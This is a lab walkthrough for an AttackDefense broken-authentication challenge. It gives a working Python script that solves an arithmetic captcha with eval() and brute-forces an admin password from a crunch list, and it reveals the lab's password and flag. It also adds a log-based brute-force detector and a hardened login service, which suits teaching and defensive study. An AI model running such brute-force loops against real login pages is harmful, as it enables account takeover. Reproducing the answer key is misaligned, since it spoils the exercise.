Walkthrough 2172

This document outlines the steps to exploit a broken authentication vulnerability in a web application using a Math Captcha. It details the process of identifying the target machine's IP, fetching the captcha, creating a password list, and executing a Python script to brute-force the login. The successful password is revealed as 'ax4M]' and the flag obtained is 'ZX7HJKE34PL4323'.

Name Attacking Login Page: Math Captcha

URL https://www.attackdefense.com/challengedetails?cid=2172

Type OWASP Top 10 : Broken Authentication

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Objective: Identify the open ports using netcat and nmap.

Step 1: Find the IP address of the target machine.

Command: ip addr

The IP address of the attacker machine is 192.133.218.2. The IP address of the target machine
will be 192.133.218.3.

Step 2: Navigate to the IP address in Mozilla Firefox.


Step 3: Right-click on the web page and view its source. Scroll down through the source to the
login form.
The page sends a POST request to the "login" endpoint.

The parameters sent with the request are:

1. username
2. password
3. captcha

The captcha is rendered between the tags <h5 style="text-align: center;margin-top: 4px"> and
</h5>.

Step 4: Write a Python script to fetch the captcha and the cookie from the webpage.

import re
import requests

session = requests.Session()
# The captcha is rendered as an arithmetic expression followed by " = " inside this <h5>;
# capture only the expression part.
regex = '<h5 style="text-align: center;margin-top: 4px">(.*?) = </h5>'

response = session.get('http://192.133.218.3')
output = re.search(regex, response.text)

# The session cookie ties the captcha to this visit; the login POST must reuse it.
print(session.cookies.get_dict())
print(output.group(1))

Command: python attack.py


Step 5: Check the output which is received on a failed attempt. Navigate to the login page and
enter incorrect information.

Step 6: Check the output when a correct captcha is provided.


In steps 5 and 6, the output page contains a string starting with "Error!". Incorrect
attempts can therefore be identified by the presence of the "Error!" string.

The password character set is also revealed in the error message. The password has length 5
and consists of the characters a, x, 4, M and ].
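Leaking the alphabet and length reduces the password to a keyspace of 5^5 = 3125 candidates, which one client can exhaust in a single session. From the defender's side, such a run is visible in the web server's access log as a burst of POST requests to the login path from one client. The following example is added here and is not part of the lab: it parses constructed combined-format log lines (not real captures) and flags any client whose login POSTs exceed a threshold inside a sliding window. It counts attempts rather than HTTP status codes on purpose, because the lab application answers a failed login with an ordinary page that merely contains "Error!", so a 200 response says nothing about success. The threshold, window, log lines and IP addresses are all assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return (ip, timestamp, method, path, status), or None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), TS_FMT)
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))


def find_login_bursts(lines, threshold=10, window=timedelta(seconds=60), path="/login"):
    """Flag clients that POST to `path` more than `threshold` times within any `window`.

    Lines are assumed to be in chronological order per client, as a log file is.
    Returns {ip: timestamp at which the threshold was first crossed}.
    """
    recent = defaultdict(deque)   # ip -> timestamps of login POSTs still inside the window
    flagged = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, method, req_path, _status = parsed
        if method != "POST" or req_path != path:
            continue
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:   # drop attempts that fell out of the window
            q.popleft()
        if len(q) > threshold and ip not in flagged:
            flagged[ip] = ts
    return flagged


def constructed_log():
    """Constructed sample lines (not real captures): one client hammering /login at one
    request per second, and one normal user with two spaced-out attempts."""
    base = datetime(2023, 10, 10, 13, 55, 0, tzinfo=timezone.utc)
    fmt = '{ip} - - [{ts}] "{method} {path} HTTP/1.1" 200 512 "-" "{ua}"'
    lines = []
    for i in range(12):
        ts = (base + timedelta(seconds=i)).strftime(TS_FMT)
        lines.append(fmt.format(ip="192.0.2.10", ts=ts, method="POST", path="/login",
                                ua="python-requests/2.25"))
    for i in (0, 40):
        ts = (base + timedelta(seconds=i)).strftime(TS_FMT)
        lines.append(fmt.format(ip="198.51.100.7", ts=ts, method="POST", path="/login",
                                ua="Mozilla/5.0"))
    lines.append(fmt.format(ip="198.51.100.7", ts=base.strftime(TS_FMT), method="GET",
                            path="/", ua="Mozilla/5.0"))
    return lines


if __name__ == "__main__":
    for ip, when in find_login_bursts(constructed_log()).items():
        print(f"{ip}: login-attempt threshold crossed at {when.isoformat()}")
```

Because every request in the lab script comes from one session and one source address, a per-client rate rule on the login endpoint catches it; the same rule should be paired with a per-account counter so that an attacker spreading requests across addresses is also seen.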

Step 7: Create a password list with crunch.

Command: crunch 5 5 ax4M] -o passwords.txt


Step 8: Modify the Python script to iterate over the password list and send a POST request to
the login endpoint along with the required POST parameters.

import re
import requests

session = requests.Session()
regex = '<h5 style="text-align: center;margin-top: 4px">(.*?) = </h5>'

with open('passwords.txt', 'r') as f:
    for password in f:
        password = password.rstrip()
        # Fetch a fresh captcha (and matching cookie) for every attempt
        response = session.get('http://192.133.218.3')
        output = re.search(regex, response.text)
        cookies = session.cookies.get_dict()
        # The captcha is plain arithmetic; eval() solves it here but executes whatever
        # the server returns, which is only acceptable against a lab target
        captcha = eval(output.group(1))
        print("Trying Password: " + password)
        data = {"username": "admin", "password": password, "captcha": captcha}
        output = session.post('http://192.133.218.3/login', cookies=cookies, data=data)
        # A failed attempt renders a page containing "Error!"
        if "Error" not in output.text:
            print("Password Found: " + password)
            break

Step 9: Execute the Python script.

Command: python attack.py

The password was found to be ax4M].

Step 10: Log in to the web application and retrieve the flag.
The flag is ZX7HJKE34PL4323.
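The walkthrough succeeds because of three server-side weaknesses: the error text reveals the password alphabet and length, nothing limits attempts per client, and the captcha is an arithmetic expression the client can solve itself. The following example is added here and is not the lab's code or the original script; it is a minimal in-memory Python login service that closes those gaps with a generic error message, a per-client lockout after a few failures, a session-bound single-use challenge, and constant-time comparisons, and then replays the walkthrough's loop against it to show where the loop stalls. The class and function names, thresholds, status codes and the plain-text user store are all assumptions (a real deployment stores password hashes and shares the counters across processes).

```python
import hmac
import secrets
import time
from collections import defaultdict

MAX_FAILURES = 5          # failed attempts a client may make before lockout (assumption)
LOCKOUT_SECONDS = 300     # failures older than this no longer count (assumption)
# Says nothing about which part was wrong, nor anything about the password's format.
GENERIC_ERROR = "Error! Invalid username, password or captcha."


class LoginService:
    """Hypothetical hardened login handler; single-process, in-memory state."""

    def __init__(self, users, clock=time.time):
        self._users = users                  # username -> password (plain here for brevity)
        self._clock = clock                  # injectable clock so lockout can be tested
        self._failures = defaultdict(list)   # client_id -> timestamps of recent failures
        self._challenges = {}                # session_id -> expected answer, consumed on use

    def issue_challenge(self, session_id):
        """Return a fresh arithmetic prompt; the answer is kept server-side and bound to the session."""
        a, b = secrets.randbelow(90) + 10, secrets.randbelow(90) + 10
        self._challenges[session_id] = str(a + b)
        return f"{a} + {b} = "

    def _locked_out(self, client_id):
        now = self._clock()
        recent = [t for t in self._failures[client_id] if now - t < LOCKOUT_SECONDS]
        self._failures[client_id] = recent
        return len(recent) >= MAX_FAILURES

    def login(self, client_id, session_id, username, password, captcha):
        """Return (status_code, message): 200 on success, 401 on failure, 429 when locked out."""
        if self._locked_out(client_id):
            return 429, "Too many attempts; try again later."
        # Single use: the challenge is consumed on every attempt, right or wrong, so one
        # solved captcha cannot be reused for a whole password list.
        expected = self._challenges.pop(session_id, None)
        captcha_ok = expected is not None and hmac.compare_digest(
            expected.encode(), str(captcha).strip().encode())
        stored = self._users.get(username, "")
        password_ok = hmac.compare_digest(stored.encode(), password.encode())
        if not (username in self._users and captcha_ok and password_ok):
            self._failures[client_id].append(self._clock())
            return 401, GENERIC_ERROR
        self._failures[client_id].clear()
        return 200, "Welcome"


def solve_prompt(prompt):
    """Answer an "a + b = " prompt without eval(); stands in for the lab script's captcha step."""
    a, b = prompt.split(" = ")[0].split(" + ")
    return str(int(a) + int(b))


def simulate_walkthrough_loop(service, candidates, client_id="192.0.2.10", session_id="sess-A"):
    """Replay the lab script's loop: fetch a challenge, answer it correctly, try one candidate.

    Returns (password accepted or None, number of candidates the server actually evaluated).
    """
    evaluated = 0
    for candidate in candidates:
        answer = solve_prompt(service.issue_challenge(session_id))
        status, _ = service.login(client_id, session_id, "admin", candidate, answer)
        if status == 429:           # locked out: further candidates are never checked
            break
        evaluated += 1
        if status == 200:
            return candidate, evaluated
    return None, evaluated


if __name__ == "__main__":
    svc = LoginService({"admin": "ax4M]"})
    print(simulate_walkthrough_loop(svc, ["aaaaa", "aaaax", "aaaa4", "aaaaM", "aaaa]", "ax4M]"]))
```

Solving the captcha correctly on every attempt, as the lab script does, buys the loop nothing here: after MAX_FAILURES misses the client receives 429 until the window expires, so the 3125-candidate list would take days instead of minutes, and the generic message gives no hint about the alphabet to start from.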
